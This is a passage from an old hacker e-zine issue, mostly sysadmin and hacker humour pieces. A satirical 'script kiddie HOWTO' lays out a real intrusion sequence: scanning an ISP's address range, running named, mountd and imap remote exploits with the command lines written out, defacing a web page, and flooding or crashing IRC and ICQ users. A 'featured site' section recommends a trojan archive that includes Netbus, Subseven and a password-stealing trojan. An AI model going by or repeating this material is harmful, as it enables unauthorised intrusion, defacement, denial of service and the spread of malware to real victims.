* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to //
// hwa@press,usmc.net, put AD! in the subject header please. - Ed //
//////////////////////////////////////////////////////////////////////////////
@HWA
HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~
Don't worry. worry a *lot*
Sysadmin Interview Qs
Path: athena.cs.uga.edu!emory!wupost!uunet!uunet.ca!xenitec!looking!funny-request
From: zoo@cygnus.com (david d `zoo' zuhn)
Newsgroups: rec.humor.funny
Subject: Job Interview pointers....
Keywords: original, chuckle
Message-ID: [S45c.6b76@looking.on.ca]
Date: 5 Sep 92 23:30:03 GMT
Organization: Cygnus Support -- +1 415 322 3811
Lines: 44
Approved: funny@clarinet.com
I was on the interviewer side of a job interview for the first time a
few days ago, and in preparation I asked many people for help and
advice. I received a set of sample questions from a best friend in a
previous life.
All credit or blame for the following truly belong to Brian R. Smith
(brsmith@cs.umn.edu), and is reproduced here by permission:
"How do you work in a team situation when all the other team
members are fools and idiots?"
"How well do you program under the influence of hard drugs?"
"Have you ever beaten or killed a co-worker?"
"Give me a rough estimate of the maximum dollar amount that you've
stolen from each of your previous employers."
"Do you object to bullwhips in the workplace?"
"Emacs or vi?"
"You have a large network of Suns being used by secretaries for word
processing in FrameMaker. Which GNU packages would you install for
your own entertainment, and how would you justify them later?"
"You see a wounded puppy bleeding and whimpering on the side of the
road while you're running to work to fix a downed computer that tens
of users are waiting for. Do you let the puppy die?" "Why not?"
"How much of your workday would you waste by reading news?"
"Recite the GNU Manifesto."
"How many clients (30% diskless, 60% dataless, 10% /var/spool/mail
only) can a Sun 600MP server serve simultaneously, and what relation
does this have to angels and pinheads?"
--
-=-
Hacker Syndrome Paper
The Hacker Syndrome
By Tad Deriso
There is some compelling force in all Hackers that seems to draw them
to their computers every day. Why they get up at 4am to use the
modem, and why they continue to rack up a truly incredible phone bill
is beyond me.
Most computer areas, at your home or at your office, tend to be messy.
Even you try to keep it clean, it is truly impossible. Whether it be
empty Coke cans laying all around, soldering devices, electric diodes,
computer parts, or integrated circuits, it is not only a pain for your
mother to look at, but a prime Russian ICBM missile target as well.
There is much detail needed to explain a Hacker. For instance,
instead of organizing his clothes by color, best ones, or style, he
organizes his by pile. Also, he likes to sing songs such as, "Let's
get Digital", "We all live in a yellow subroutine", and "Somewhere
over the RAMbow".
Most Hackers do well in school. The reason is not to impress their
teachers, not to get money from their parents, and not to be educated,
but they do it so they can hopefully get a scholarship to MIT. You
can't blame them, though, if they are looking out into space. It
might be because they are worried if MCI traced the calls that they
sent to NORAD.
All Hackers, big or small, love computers, whether they be Trash-80's
or an IBM 360/VM workstation. When they get on one, it's mighty hard
to get them off of it.
There are 2 types of Hackers. One who likes to crash local BBS's, and
the one who writes programs in Assembly Language. The Hacker who
crashes systems is the one that most people think that a Hacker is. A
typical example of one is John Fredrickson (A.K.A. "The Phone Man").
He loves to crash computers, and break into illegal systems. The ones
that he has gotten in to are MCI, CitiBank, school systems, IBM,
Southern Bell, and Georgia Tech, not to mention all the ones in
between.
The second type of Hacker is the programmer. He writes games,
utilities, and anything else that he can think of. Take for example,
John Harris, a freelance software writer for On-Line Software Co.
John had a brainstorm one day, and decided to write Frogger for the
Apple. He thought that it would take about 3 weeks to complete. He
started on Frogger a week late, because of the complicated music set
that he had to write. After two months, he was almost done. He
decided to take a break and go to the Software Expo. He decided to
take his nearly completed Frogger, and show it to the consumers at the
show. He also took with him the only back-up copy, in case the main
disk did not boot.
While at the fair, he was talking to the Manager about getting a
booth. He had his disks with him. Then, when he got a booth
reserved, he reached down to get his disks, and they were gone! All
his hard work, including the MultiLevel character generator, music
lines, disk subroutines, assembly routines, debugging programs, etc.
All gone.
After that tragedy, John was in a deep depression. He finally started
working on it again in 3 months. He completed it in 4 months and 3
days.
Part Two:
Hackers always take time off. There is always one way to notice a
true Hacker. At a party, the true Hacker is the one in the corner
talking about operating system security and how to get around it. At
the beach, the True Hacker is the one drawing flow charts in the sand.
At a football game, the true Hacker is the one comparing the football
plays against a simulation printed on 11 by 14 fanfold paper.
Most Hackers work for the U.S. Government-- mainly the Department of
Defense. You can see the best Hackers at the Jet Propulsion
Laboratory in California.
What sort of environment does a Hacker function best in? No, not a
heated room with a clean table and disks organized neatly, but they do
best in rooms that have line-printed Snoopy calendars from the year
1969. They do not know how to cook, so they survive on Twinkies and
coffee. Instead of wasting electricity for a heater, they spend it on
air-conditioners to cool of their computer system in mid-January when
the temperatures are below freezing. They wear layers and layers of
clothing to keep the body heat in. When you see one of these people,
instead of a Hacker coming into your mind, you think that he is about
to go on a Polar expedition somewhere in the North Pole.
Hackers also like to hang around arcades. (This is also true for
kids, little old ladies, and fighter pilots.) There, secluded in their
own environment, Hackers can talk freely on computer hints and short
cuts while playing Pac-Man, or Joust.
All Hackers like Graphics. They like low-resolution, but prefer high-
resolution the best. These graphics, such as Sine waves, rotating 3-D
boxes, and little balloons, are confined to the limits of a systems
capability. The older more experienced Hackers are the ones who are
lucky enough to get to work on a VAX system, and maybe even a CRAY-1
SuperComputer. If they use these, they have only the limits of their
imagination to stop them.
Most Middle School Hackers between the ages of 10 through 14, like to
use computers to do reports on, and play games. Some of these younger
generation Hackers have gotten into BASIC programming.
Some people, like to impress real Hackers by making them think that
they know everything. There is a certain name for this kind of
person. He is a Sub-Hacker (Intillectuous dumbfoundeth). For
instance, you come up to them one day, and say,"Hey so-and-so what
does BASIC stand for?" and you could sit there for days, and he would
act like the answer was on the tip of his tongue, when it was probably
in his toes. It is people like this that give Hackers a bad name.
Part Three:
All Hackers have certain rules that they go by. One is to never call
long distance on Monday, because of the high phone charge. Another is
If builders built buildings they way programmers wrote programs, the
first woodpecker that comes along would destroy civilization. Another
is, if the computer accepts a program on the first run without any
errors, either there is a malfunction, or it must be a dream.
Hackers are a unique breed. Combining intelligence, personality, and
a morale sense of good taste. A Hacker enjoys the environment that
appeals to him the most. Such as, the computer room, the arcade,
science lab, or the Atari downstairs. They like to be alone.
Secluded in their own thoughts, thinking of what the password could be
to log on to General Electric. Hackers are the people who are going
to make our future brighter, and more exciting in the field of
electronics, data processing, artificial intelligence, and
programming. We need to support these people in all the ways that we
can, so we will be insured of a more happier future in the world of
technological advancements.
-=-
Awesome Unix Chdir Program
Path: athena.cs.uga.edu!emory!swrinde!zaphod.mps.ohio-state.edu!uunet.ca!xenitec!looking!funny-request
From: baur@mdcbbs.com (Steve Baur)
Newsgroups: rec.humor.funny
Subject: NEED HELP FAST !!!!!!!!!
Keywords: original, computer, smirk
Message-ID: [S425.63b1@looking.on.ca]
Date: 12 Jul 92 23:30:04 GMT
Lines: 58
Approved: funny@clarinet.com
This composition is original, although the subject is not.
--------------------------- Cut Here---------------------------------
Newsgroups: comp.unix.questions
Subject: NEED HELP FAST !!!!!!!!!
From: cs245@cs.somewhere.edu (The Unknown Hacker)
Date: 7 Apr 92 12:55:45 EDT
Organization: UNIX Guru's R Us!
HI, EVERYBODY!!!!
Sorry if this is a FAQ, but I've heard that a FAQ is something
everybody already knows, but since I don't know the answer to this
everybody doesn't know it, so it can't be a FAQ, so here I go ...
I've just created about the most Awesome change directory program ever
written. If it doesn't find the target directory through an
exhaustive CDPATH search, it uses the most sophisticated spelling
corrector (based on a thorough analysis of Webster's on-line
dictionary, and a list of the 1000 most common directory names on Unix
systems throughout the world) to try to find a match that way. If
that fails, then it tries to create the directory, and if that fails,
it opens /dev/uri-geller, and reads the mind of the invoker to try to
figure out what to do. It executes with almost 0 impact on system
resources, and is most truly the finest/tightest code ever to grace
the memory of a computer.
The only problem is that it doesn't work. No matter how I've tried,
once I've done that last chdir (and I've tried doing several identical
chdir(2)'s in a row to see if that would make the directory change
more "sticky" but that didn't work) I always end up where I started in
the shell I started my program in. I've tried setting the PWD, and
CWD variables with putenv(3), but that doesn't seem to have any effect.
What it really seems to me, is I need some way of telling the shell what
directory it's supposed to be in when my program is done executing.
Put more simply, I need a way of modifying the environment of a parent
process.
E-mail responses only. There's too much noise on this bboard for me to
be able to read it. And HURRY!!! I need to turn this project in by 5pm
tonight !!!!
+----------------------------------------------------------------------------+
| _ /| |
| \'o.O' UNIX Guru in training |
| =(___)= |
| U Joe Programmer |
| ACK.. THPPT!!!! cs245@cs.somewhere.edu |
| |
+----------------------------------------------------------------------------+
--
- Steve Baur@mdcbbs.com (236/607 4/1/92)
--
System Administration Support Fees
Support Fees:
Calling me with a question - $10
Calling me with a stupid question - $20
Calling me with a stupid question you can't quite articulate - $30
Implying I'm incompetent because I can't interpret your inarticulate problem description - $1000 + punitive damages
Questions received via phone without first trying help desk - $10.00
Questions where answer is in TFM - $100.00
Calling me back with the same problem *after* I fix it once - $100
Insisting that you're not breaking the software, the problem is on my end somehow - $200
Asking me to walk over to your building to fix the problem - $5/step
Asking me to drive to another town to fix your problem - $50/mile + gas
If you interrupt me while I was trying to actually fix somebody else's problem - $45/hr
If you try to hang around and get me to fix it now - $50/hr
If you expect me to tell you how I fixed it - $60/hr
If you've come to ask me why something isn't working that I'm currently working on - $70/hr
If you're asking me to fix something I fixed for you yesterday - $75/hr
If you're asking me to fix something I told you I fixed yesterday, but never did fix - $85/hr
If you're asking me to fix a quick patch that I made that didn't work - $95/hr
If you're bugging me while there's another admin in the room who could have done it for you - $150/hr
Making me trek to your office to fix your problem then leaving immediately after hanging up the phone - $1500.00
Calling up with a problem which "everybody" in the office is having and which is "stopping all work." Not being there when I rush over to look at it and
nobody else in the office knows anything about it. - $1700.00
Explaining a problem for 1/2 hour over the phone BEFORE mentioning it's your personal machine at home - $500.00
Self-diagnosing your problem and informing me what to do - $150.00
Having me bail you out when you perform your own repairs I told you not to do - $300.00
Not telling all of your co-workers about it - $850.00
Figuring out you mean floppy drive when you say hard drive - $50.00
BEFORE I order your replacement hard drive - $250.00
Fixing your "broken" mouse with a mousepad - $25.00
Fixing your "broken" optical mouse by rotating the mousepad 90 degrees - $35.00
Fixing a "broken" mouse by cleaning the rollers - $50.00
Fixing your "broken" printer with an ink/toner cartridge - $35.00
Fixing your "broken" ANYTHING with the power button - $250.00
Fixing the "crashed" system by turning the external disk back on - $200.00
Fixing the "hung" system by plugging the ethernet transciver back in - $375.00
Fixing the crashed nameserver by plugging back in the SCSI cord someone accidentially yanked out on Friday afternoon when the 'real' sysadmin has just left
for a two week vacation - $400
Visiting your old university and fixing the broken PC by plugging the monitor lead back in - $50
Explaining that you can't log in to some server because you don't have an account there - $10
Explaining that you don't have an account on the machine you used to have an account on because you used it to try to break into the above server - $500
Forgetting your password after it was tattooed on your index finger - $25
Changing memory partitions without informing me first - $50
Installing programs without informing me /getting permission first - $100 per program
Technical support for the above programs - $150 per hour (regardless of whether I know the program or not :))
Spilling coke on keyboard - $25 plus cost of keyboard
Spilling coke on monitor - $50 plus cost of monitor
Spilling coke on CPU - $200 plus cost of motherboard swap plus hourly rate of $150 per hour spent reinstalling the system
Leaving files on desktop - $5 per file, $10 per day the file is left unclaimed
Cleaning the mouse with spit and sleeve - $50 plus cost of sleeve plus cost of therapy :)
Bringing in your own copy of the original Norton Utilities v1.0 to fix a brand new machine - $200
Chewing on the end of the graphic tablet stylus - $25
Putting feet up next to workstation after ten mile jog through NYC streets - $50
Spending 30 minutes trying to figureout what your problem is, and another 5 explaining how to verify and fix it, only to hear you say... "So that's what the little
box that popped up on my screen was telling me to do!" - $40
Listening to your network troubles, suggesting that you check to see if you are plugged into the network jack, hearing yes, trying five other things, asking you
to identify your plug type, listening to you drag furniture, and hearing a sheepish, "Oops. Nevermind." - $35 (including discount for polite apology)
Dealing with tech support requests for obviously pirated software - $25
Dealing with "How can I get another copy of [obviously pirated software]? Mine just died." requests - $45
Having to use the "We're really not the best people to talk to about that; why don't you try calling the number on the box in which you bought it?" line - $55
Actually needing to explain copyright law to you after you failed to get the hint in the previous response - $95 (includes instructions for getting freeware
replacements from the public file server)
Having to point out anything that's on the wall in a typeface larger than 18 points - $15
If I wrote the sign - $45
If it's in a 144 point font and taped to the side of the monitor facing the door - $75
Reporting slow connection by passenger pigeon packets to MPEG archive in Outer Slobavia as a Mosaic/Netscape/Gopher/FTP client problem - $25.00
Reporting it more than once - $50.00
Reporting it more than once and implying slothfullness on tech support's inability to solve problem - $200.00
Beeper Prices:
Beeping me when I'm out with the significant other - $50
Beeping me when I'm out of town and I took pains to insure that help files were left all over and that diagnostics had been run on all machines before I left -
$100
Beeping me more than once to tell me that the printer's offline and the fix is to press the On Line button - $200
Beeping me more than once while I'm asleep - $50 per beep
Beeping me and not identifying yourself within the first 5 seconds - $25
Beeping me and then changing your story / denying you placed the call / hoped I would forget who caused the problem - $500
Special Rates:
Dealing with user body odor - $75.00/hour
Dealing with user not familiar with the primary language spoken at site - $50.00/hour
Dealing with user who is (self-proclaimed) smarter than you are, but still calls every other day for help - $100.00/hour
Dealing with computer hobbiests - $125.00/hour
Questioning the other prices .................................$50
-=- .
A Day in the Life of a SysAdmin
by Thomas Farrell, tfarrell@lynx.dac.neu.edu
The life of a sysadmin goes approximately as follows.
8am: Your pager goes off and wakes you up. The message says it's the office, and it's a crisis. You roll out of bed moaning.
8:15am: You are now sufficiently awake to phone the office. Your pager has gone off three times already. You get through to the office and the receptionist is frantic.
She says nobody in the entire office can print and they have a major proposal that has to be faxed out before 9am and if it isn't the company could lose a million
dollars in new business. You try to get her to explain what's wrong, but she's incoherent.
8:30am: You're dressed in yesterday's dirty clothes (they were all you could find in time) and running out the door, sipping a Jolt cola and hailing a cab to the office.
8:45am: You arrive at the office.
8:46am: You determine that the problem is that the printer is turned off, and you turn it back on. 10,000 pages spew out from the hundreds of multiple failed
attempts by all of your coworkers to print.
8:47am: Your boss reams you out for "not having fixed that printer problem last time when you said it was all taken care of. You spend the next hour explaining that
there's nothing you can do to stop people from turning off the printer if they really want to. You don't bother to mention that you happen to know that the person
who did it is your boss's spouse.
9:45ish: You finally convince your boss to release you and make your way to your office, assaulted all along the way by people demanding that you must help them
fix things right now that you know are going to take weeks and really aren't priority.
10am: You finally arrive at your office and shut and lock the door to keep out the users. You start to read the 40 or so email messages you find waiting every
morning, which include about 5 new requests, 34 or so messages demanding to know why such and such hasn't gotten done yet, and one message from your boss
denying your request to have an assistant and demanding that you justify how you spend your time yet again.
10:30am: You realize that you're never going to finish getting through your email if you keep getting interrupted by these damned telephone calls from the same
people who sent you the email asking the same questions, so you put your phone on do-not-disturb and go back to your email.
11am: You've just finished responding to all of your email, including the umpteen millionth justification of your existance for your boss. Unfortunately, the secretary
has figured out how to order the phone system to override your do-not-disturb on your phone, and is now routing all the angry phone calls from your coworkers to
you.
11:30am: You finish talking to everyone on the phone and calming them down.
11:30am-4:30pm: You work your ass off on whatever projects have the most urgency to the company. Usually this involves a lot of work with software, crawling
around on the floor several times, tearing a hole in your clothing, and banging your head (hard) on the bottom of a desk.
3pm: You have your lunch delivered to your office.
4:30pm: You finally get to touch your lunch, and realize that Burger King french fries do not taste good cold. You're on about your 15th coke since arriving in the
office.
4:35pm: Your lunch is over. You're not finished eating, but your boss has just phoned you (he knows how to override the DND on the phone too) and demanded
that you drop everything and go fix some assinine problem which you know is caused by the user and which you fix every week and which you have warned the user
about but about which they just don't listen.
6:30pm: You finish the project your boss set you to and decide to try to sneak out of the office and go home. (Not that you have a social life or anything, but you
haven't had 8 hours sleep in a month and a half.) In the elevator on the way out of the office you encounter a coworker, who grabs you by the ear and drags you
back to the office to fix something that's bugging them.
6:30pm-8pm: Somehow, despite repeated attempts to leave, the moemnt you try to actually do so, someone else appears to force you to work.
8pm: You're about to depart when you're suddenly informed that there's some vitally urgent data processing that has to be done and that only you know how to do
and which can't be performed until all of the data entry people have left for the night at 10pm.
8pm-10pm: You try to nap in your office but the phone keeps ringing so you finally give up and put in several more hours of working.
10pm: You try to do your data processing but can't because there are still people logged into the data acquisition system. You spend the next fifteen minutes running
around begging them to log out, and they reply that "yeah, I'll be out in a minute..."
10:20pm: You get sick of waiting, walk over to the server console, issue commands to kick off all the users, and disable logins.
10:30pm-2:30am: You perform that data processing which nobody else could do because they won't let you teach them because they know what kind of hours you
have to put in doing it.
Midnight: Your blood turns to coca-cola.
2:30am: You realize that the data processing isn't QUITE done but you're about to pass out so you re-enable logins so you won't get paged about THAT in the
morning, scrounge a taxi voucher out of your desk (they've given you your own pad because you use them so often), call a taxi, and leave the building.
2:45am-3:15am: You freeze your ass off waiting for a taxi.
3:15am-3:30am: The taxi takes you home. The driver seems to have decided to take the scenic route for the hell of it.
3:31am: You collapse in a heap on your bed and fall asleep face down with your shoes on the pillows and your clothes still on because you're too tired to remove
your clothes or even orient yourself properly on the bed.
8:00am: Your pager goes off.
Repeat ad nauseum until your boss doesn't like your response to one of his "justify your existance" demands and fires you or you die of caffine poisioning. Oh, and
don't bother factoring in any weekends or holidays: You'll be expected to work those too.
Now do you have some slight understanding of why I don't like being a sysadmin? I really lived like this for about a year. I'm amazed I survived it.
-=-
As true then as it is now, from 1992.
Network Admin Job Descr
From UGANET@uga.cc.uga.edu Tue Apr 28 09:17:17 1992
Return-Path: [UGANET@uga.cc.uga.edu]
Received: from uga.cc.uga.edu by marie.stat.uga.edu (4.1/SMI-4.1)
id AA17223; Tue, 28 Apr 92 09:17:17 EDT
Message-Id: [9204281317.AA17223@marie.stat.uga.edu]
Received: from UGA.CC.UGA.EDU by uga.cc.uga.edu (IBM VM SMTP R1.2.2MX) with BSMTP id 4057; Tue, 28 Apr 92 09:15:46 EDT
Received: from UGA.BITNET by UGA.CC.UGA.EDU (Mailer R2.07) with BSMTP id 8820;
Tue, 28 Apr 92 09:15:44 EDT
Date: Tue, 28 Apr 1992 09:13:01 EDT
Reply-To: "David Matthews-Morgan" [DMM@uga.cc.uga.edu]
Sender: Technical Discussion for UGA Networking [UGANET@uga.cc.uga.edu]
From: "David Matthews-Morgan" [DMM@uga.cc.uga.edu]
Subject: A Network Posting for Your Amusement
To: Multiple recipients of list UGANET [UGANET@UGA.BITNET]
Status: OR
This posting seems to fit what many of us are experiencing as network
managers. Does this strike a chord with anyone here?
2
DM
---------------------------- Original Message ------------------------------
From: deljones%THAMA1.APGEA.ARMY.MIL@uga.cc.uga.edu
Subject: Re: Network Administrator Job Description
X-To: Novell@suvm.acs.syr.edu
To: Multiple recipients of list NOVELL [NOVELL@SUVM.BITNET]
]Our department is considering budgeting a full-time position for a network
]administrator. Likely functions are network support, applications support,
]and liaison with computing center.
]Does anyone have a job description and salary info that might help us budget
]such a position?
I am currently on about 35 pages of a job description. It looks like 50 to 75
tight pages before completion.
Basically, the description is to know everything about computers, business,
training, programming and hardware support and do everything, including
forecast 5-15 years into the future. Should have at least completed grade
school equivalency. Have 10 years or more network experience with 20+ years of
computer experience. Needs CNE certification. Be willing to work 24 hours a
day, 7 days a week. Must be willing to work for starvation wages and feel
privileged to be able to work with all of the equipment. Must be trustworthy,
honest, kind and above all thrifty. Must understand overtime is a luxury "we
can not afford." Should be able to write 30 pages of documentation for every
10 minutes of installation work (spending no more than 10 minutes doing this
documentation). Requires an even temperament, realizing that the LAN Manager
is a servant to all, master of none. Should be able to learn any software
package in 10 minutes, so as to perform a one day training seminar scheduled
for NOW. Must be willing to work in a converted closet with no windows or
ventilation. Must be willing to wear a beeper to the bathroom. Must commit
to giving a minimum of one year's notice before leaving.
There are more requirements, but that gives the general gist. Oh and by the
way because of enlightened management, the salary should be at least 10% over
minimal beginning secretarial wages.
-Del
Recently uploaded to PacketStorm;
Berkeley California - http://www.pressanykey.com/humor/berkeleysong.html
Sung to the tune "Hotel California" by the Eagles
In a dark dim machine room
Cool A/C in my hair
Warm smell of silicon
Rising up through the air
Up ahead in the distance
I saw a Solarian(tm) light
My kernel grew heavy, and my disk grew slim
I had to halt(8) for the night
The backup spun in the tape drive
I heard a terminal bell
And I was thinking to myself
This could be BSD or USL
Then they started a lawsuit
And they showed me the way
There were salesmen down the corridor
I thought I heard them say
Welcome to Berkeley California
Such a lovely place
Such a lovely place (backgrounded)
Such a lovely trace(1)
Plenty of jobs at Berkeley California
Any time of year
Any time of year (backgrounded)
You can find one here
You can find one here
Their code was definately twisted
But they've got the stock market trends
They've got a lot of pretty, pretty lawyers
That they call friends
How they dance in the courtroom
See BSDI sweat
Some sue to remember
Some sue to forget
So I called up Kernighan
Please bring me ctime(3)
He said
We haven't had that tm_year since 1969
And still those functions are calling from far away
Wake up Jobs in the middle of the night
Just to hear them say
Welcome to Berkeley California
Such a lovely Place
Such a lovely Place (backgrounded)
Such a lovely trace(1)
They're livin' it up suing Berkeley California
What a nice surprise
What a nice surprise (backgrounded)
Bring your alibies
Windows NT a dreaming
Pink OS on ice
And they said
We are all just prisoners here
Of a marketing device
And in the judges's chambers
They gathered for the feast
They diff(1)'d the source code listings
But they can't kill -9 the beast
Last thing I remember
I was restore(8)'ing | more(1)
I had to find the soft link back to the path I was before
sleep(3) said the pagedaemon
We are programmed to recv(2)
You can swap out any time you like
But you can never leave(1)
[ substitute whirring of disk and tape drives for guitar solo
]
Written by David Barr
and Ken Hornstein
and a little help from Greg Nagy
http://www.genocide2600.com/~tattooman/unix-humor/script-kiddy-HOWTO
After you're done reading the access denied msg when you try going up dirs manually
heres the 'side door' : http://www.genocide2600.com/~tattooman/new.shtml ;-)
How-to Be a sKr1pt k1ddi3 by DrHamstuh
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/* This , Like the world is only what you perceive it to be */
Q:"How Do I Become A Hacker?"
A: learn to code , install SunOS , get a SPARC , devote the rest of your
life to computers and technology
Q: well fuck that I'm lazy , how do i become a script kiddy?
A: hmm I guess i can show you , whatever you do with this Info is your
fault not mine...
First things first , I am taking it you have Linux installed and a
conection to the net. If you are still on Windows* [TM] (C) (R)
then please look into getting a linux CD-ROM from www.cheapbytes.com
install linux , setup PPP [if in redhat just startx and use netcfg pussy]
and come back and read this again ... thanx
-=-=-=-=- t0p s3kr3t 0nly l1nux k1ddyZ c4n r3ad bel0w th1z l1n3 -=-=-=-=-
/* top secret hamstuh encryption */
JLKADJFLK;ASDFJLKSA;DJFLASK;DFJSLAKFJLAKSDFJLASKFJDLSKDJF
* tools *
mountd remote exploit code
named remote expliot code
imap remote exploit codes
wu-ftpd remote exploit code
Security Scanner. SSCAN by JSBACH
listen remote exploit code
q-pop remote exploit code
ICQ bomber & flooder source code
Denial Of Service code
BitchX
BitchX War Scripts
* tools EOF *
* general idea *
Cause as much trouble with the tools you have as posible
figure out what each tool does and how / why it works
overall have fun with people and concider yourself better
than them because you can use teardrop.c to freeze their windows
computer or ADMmountd.c to break into their elite red hat 5.1 box
* getting started *
to get started first you have to be a able to walk ,
being able to walk is relative to this as being able to move around
your operating system. if you are "hacking" from a linux box [ YAY ]
then these commands will help you.
mkdir = creates a dir
mv = move , rename
cp = copy
rm = remove
id = shows you who you are
w = shows you who's logged in
tail -f = lets you watch a file as text is added to it in real time
echo = add's text to a file
cd = changes your directory
those are some of the basic's now you should be able to get started.
===============================================================================
HOT TIP: make a dir in your base directory called .anythingsecret
the . makes it not able to be shown to a regular ls , kind of hides it.
HOT TIP: put all your "hacking" files in that .anythingsecret DIR
keep everything clean and in order and it will be a ton easier to keep
your thoughts 2gether and in the long run you may have more "r00t shellz"
-----------------------------------------------------------------------------
"r00t shellz" : in my earlier days i was told by someone who had
been on the scene for a long time , longer than i had that "root shells"
are pretty much what you judge your eliteness on.
------------------------------------------------------------------------------
There are NO rules to being a script kiddy ,
and NO morlas are enforced upon you ,
your actions are your actions ,
and what you see fit to do will always be looked at by others and judged.
------------------------------------------------------------------------------
I want to..
A] hack shit now.
B] get on IRC and learn more before i continue my life as a script kiddy
C] change my mind and go get a sparc and be a real haxor
if you said A then you have the mentality it takes to be a true script
kiddy and im not going to hold you back any longer .. lets get started on
talking about how to break into those krad red hat systems...
If you just want to hack ANY computer on any network
then i suggest just letting your Security Scanner scan
for a long time and then picking the computers out of your
scanners log file that look like you would be able to gain access to the
easiest. [ mountd / named / imap ]
If you are using SSCAN (tm) JSBACH, and are ready to hack some shit NOW.
then start SSCAN running on some small town ISP..
ie:
home@linux# ./sscan localisp.com/24 >> hot.list &
once the scanning has completed then use your favorite word editor [PICO@#%]
and read the file.. look for where SSCAN has told you that a server is
mountd/imap/or named overflowable.. and then just try all the servers
listed with the exploit that it is listed for... surely after a while one
will work.. even the sun shines on a cluebie script kiddy's ass some day.
[ gcc -o rotshb rotshb.c ]
./rotshb server.com 4 1
[ gcc -o mountd ADMmountd.c ]
./mountd server.com
[ gcc -o imapk1ller imapexploit.c ]
./imapk1ller host.com offset
you will now when your exploit worked and when you have root ,
and you will probally get a funny little feeling , kind of an exited
feeling that will be your motovation to do this again..
now once you have root you are ready for the beef of a script kiddys
life....
changing HTML.. a script kiddy changes HTML in many ways for many
reasons.. the funnier hacks i have seen are hacks that are supose to be
serious in which script kiddys voice their opinions on varios things ..
from the soup at school not tasting good to the government just any
opinion that they have in thier little brains ..
[ find / -name index.html ]
root@hackedbox# echo " i own you " >> /home/httpd/html/index.html
now that you have defaced your first web page , get on IRC and brag about
it , as a script kiddy its something that you HAVE to do..
load up BitchX and your War Script [ Civic.bx ] and head on over to
TeenChat on EFNET.. scroll the URL to the page you just "hacked" and if
anyone says anything negative to you say " Shut Up Bitch I Own You "
and nuke them with /teardrop or any other elite d.o.s alias your war
script may have.. you are now on your way to being a super ereet script
kiddy.. by now you have probally allready caused a stir in the underground
and JP from AntiOnline.com is going to interview you because you hacked
the first jewish server that was ever ran off linux .. and now the pope
thinks you are the anti-christ and has been talking about you as an evil
haxer all week on the news.. JP see's a chance to exploit you and make
money off your teen ignorance and does so in a gracefull manor.
now your ego is larger then your IQ ,
you know how to root a server ,
you know how to D.o.S anyone on IRC ,
you are confident ,
you are clueless ,
you think you are a god ,
you have younger want to be script kiddys worshiping you ,
you are in the pinacle of your script kiddy life ,
now take your ICQ flooders / bombers and herass everyone on your ICQ list
for no obvious reason..
you are now a Script Kiddy .. enjoy your new life of stupidity...
in about a year you will realize that being a script kiddy is nothing but
a waste of time.. and sure you have learnt your way around linux like a
small town with only once street to pick up hookers , but you still have a
long way to go before you are corprate material.. and once you decide
computers are your dream and thats what you want to do for the rest of
your life you notice that you wasted the last year and a half being a
script kiddy .. inflating your teen ego .. hurting lil web servers for no
reason other than the thrill of the hack.. heh
---- another uselss rant by DrHamstuh
@HWA
HOW.TO How to hack part 3
~~~~~~~~~~~~~~~~~~
To be continued (probably) in a future issue... if time permits
and inclination is prevelant. ie: if & when I feel like it.. :p
(discontinued until further notice)
Meanwhile read this:
http://www.nmrc.org/faqs/hackfaq/hackfaq.html
<a href="http://www.nmrc.org/faqs/hackfaq/hackfaq.html">Link</a>
And especially, this:
http://www.tuxedo.org/~esr/faqs/hacker-howto.html
<a href="http://www.tuxedo.org/~esr/faqs/hacker-howto.html">Link</a>
(published in its entirety in issue #12)
@HWA
SITE.1 Featured site: http://www.hackworld.freeserve.co.uk/look/trojanx.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This site constantly has some of the newest and hardest to find trojans
around... check it out,. no banner click games here.
http://www.hackworld.freeserve.co.uk/look/trojanx.htm
<a href="http://www.hackworld.freeserve.co.uk/look/trojanx.htm">TrojanX</a>
A shot from their front page:
Welcome to our trojan archive. We have some very rare and very
new trojans here including the rare Netbus 1.20 and the very good
new Netbus 2.0. Enjoy!
Feel free to E-mail me with any comments our ideas. You might even get an answer.
Name Description
Subseven 1.1 An updated version with many new features including an
offline keylogger
Subseven Brand spanking new trojan for you guys. Its a netbus/bo
clone with a good interface. Released 28/2/99!
NetRex Same as Netbus 2.0 execpt it dosen't have the installation
files.
Netbus 2.0 Its out! The netbus 2.0 beta. This version has a new interface
and alot more functions. Download it now
Netbus1.20 A very old and rare version of the popular trojan.
BOclient 1.4 Brand new client for BO with multiple ip feed , built in send
and recieve TCP and alot more
Wincrash Very new trojan with some neat functions, like disabling ctrl +
alt + del.
Executer Very new trojan with some neat functions, destructive
functions
Backend Back orifice with a supposedly more user friendly interface
Girlfriend A good scarce trojan used mainly to for getting passwords of
other computers.
Fatal network error Outputs a message box to the screen saying that a fatal
network error has occoured and prompts for username and
password. Writes this info to c:\os32779.sys in plain text
Millenium Hot of the shelves, new trojan, has some good functions,
May possibily contain a virus!
Netbus 1.60 version 1.6 of the very good and simple to use trojan.
Recomended
Netbus 1.70 Version 1.7 of the very good and simple to use trojan.
Recomended
Whackjob A game containing the netbus trojan, when the user plays it
the trojan is installed
Back orifice Probably the best known trojan, a bit more difficult than
netbus
Gatecrasher A little known trojan, simialar to netbus but not as good
Deepthroat Another little known trojan, quite easy to use not that
complicated.
Masters
paradise 8 In french, Would be the best except causes lots of errors
H.W Hacked websites
~~~~~~~~~~~~~~~~
Note: The hacked site reports stay, especially with some cool hits by
groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed
* Hackers Against Racist Propaganda (See issue #7)
Several sites were cracked in support of hacker/cracker Jason Mewhiney
who recently 'defaced' a nasa website.
The page's message is archived on HNN...
http://www.hackernews.com/archive/1999/oreilly/index.html
* See archive for further details
Brother Mandalo explains:
On April 1st, 1998, Jason Mewhiney was arrested by the RCMP for allegedly
defacing the NASA web page: http://www.hq.nasa.gov. This arrest was originally
